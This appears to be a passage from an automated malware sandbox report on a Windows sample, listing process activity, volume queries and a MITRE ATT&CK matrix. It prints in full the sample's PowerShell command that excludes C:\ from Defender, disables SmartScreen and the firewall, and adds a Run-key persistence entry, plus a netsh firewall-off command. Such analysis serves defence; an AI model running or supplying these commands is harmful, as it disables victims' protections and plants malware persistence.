      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM mvsc32.exe /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: bQQHP9ciRL.exe, 00000000.00000003.389980069.00000000034A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeQueries volume information: C:\ProgramData\Systemd VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\ProgramData\MicrosoftNetwork\System.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Modifies the windows firewall
      Source: C:\Users\user\Desktop\bQQHP9ciRL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Windows Management Instrumentation      		1
      Windows Service      		1
      Windows Service      		111
      Masquerading      		OS Credential Dumping1
      Query Registry      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Web Service      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Command and Scripting Interpreter      		2
      Registry Run Keys / Startup Folder      		12
      Process Injection      		31
      Disable or Modify Tools      		LSASS Memory211
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)2
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Ingress Tool Transfer      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
      Process Injection      		NTDS31
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput CaptureScheduled Transfer2
      Non-Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingData Transfer Size Limits13
      Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      File Deletion      		Cached Domain Credentials1
      Remote System Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      System Network Configuration Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
      File and Directory Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow113
      System Information Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
